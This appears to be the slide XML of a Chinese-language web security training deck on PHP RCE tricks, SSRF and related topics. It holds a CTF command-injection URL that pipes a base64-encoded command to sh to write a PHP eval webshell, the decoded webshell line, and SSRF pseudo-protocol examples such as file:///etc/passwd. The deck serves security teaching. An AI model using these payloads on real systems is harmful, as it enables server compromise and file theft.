            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>√</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1353185" y="1431290"/>
            <a:ext cx="9504680" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>BUUCTF-[GXYCTF2019]Ping Ping Ping		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>尝试写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650875" y="3869055"/>
            <a:ext cx="10146030" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://8808bb8c-e4a9-42c9-8131-42ac7d7ffcfa.node5.buuoj.cn:81/?ip=127.0.0.1;echo$IFS$1ZWNobyAiPD9waHAgICBAZXZhbChcJF9QT1NUWydhJ10pPz4iPmV2aWwxLnBocA==|base64$IFS$1-d|sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697865" y="4943475"/>
            <a:ext cx="7974330" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>echo "&lt;?php @eval(\$_POST['a'])?&gt;"&gt;evil.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>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34770" y="559435"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>推荐阅读</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464945" y="1511300"/>
            <a:ext cx="8761730" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>https://www.freebuf.com/articles/web/359345.html</a:t>
            </a:r>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68675" y="2803525"/>
            <a:ext cx="5435600" cy="752475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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66825" y="509905"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>SSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1266825" y="1195705"/>
            <a:ext cx="8322945" cy="3303270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1180465" y="4899025"/>
            <a:ext cx="10542905" cy="1657985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SSRF (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>全称：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Server-Side Request Forgery:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器端请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击的目标是从外网无法访问的内部系统。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者从外网通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> SSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击访问到内网，接着对内网的应用展开攻击，这些应用包括但不限于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SMTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> ……</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目录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基础第二次培训</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>php RCE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>trick</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基础</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60475" y="509905"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>形成原因</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1130935" y="1363345"/>
            <a:ext cx="10752455" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址获取网页文本内容，加载指定地址的图片，下载等等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>常见场景：在线翻译、在线图片上传、文章收藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114935" y="3077210"/>
            <a:ext cx="5209540" cy="2880995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5520690" y="2894965"/>
            <a:ext cx="6296025" cy="3063240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="655955" y="4518660"/>
            <a:ext cx="10533380" cy="979805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="655955" y="6068695"/>
            <a:ext cx="11031220" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>关键字中寻找：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>share</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>wap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>display</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sourceURl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>imageURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>domain</a:t>
            </a:r>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295" y="522605"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>相关危险函数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="986790" y="2066925"/>
            <a:ext cx="10218420" cy="28962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2060" y="479425"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>靶场练习</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="151130" y="1236980"/>
            <a:ext cx="9373235" cy="4582160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841500" y="2592705"/>
            <a:ext cx="10191750" cy="2580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54760" y="578485"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>作用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064260" y="1901825"/>
            <a:ext cx="10286365" cy="328358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9995" y="441325"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>相关伪协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1156970" y="1585595"/>
            <a:ext cx="9286875" cy="4659630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>file:/// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从文件系统中获取文件内容，如，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>file:///etc/passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>dict:// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字典服务器协议，访问字典资源，如，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>dict:///ip:6739/info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gopher:// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分布式文档传递服务，可使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gopherus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，一般用于工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等服务。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>gopher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议在一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>解析库或客户端中被实现为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>直接在指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> host:port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>上发起</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>连接并发送原始字节流</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的能力。因此，攻击者可以把任意字节（包括针对内网服务的协议报文）通过应用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/URL </a:t>
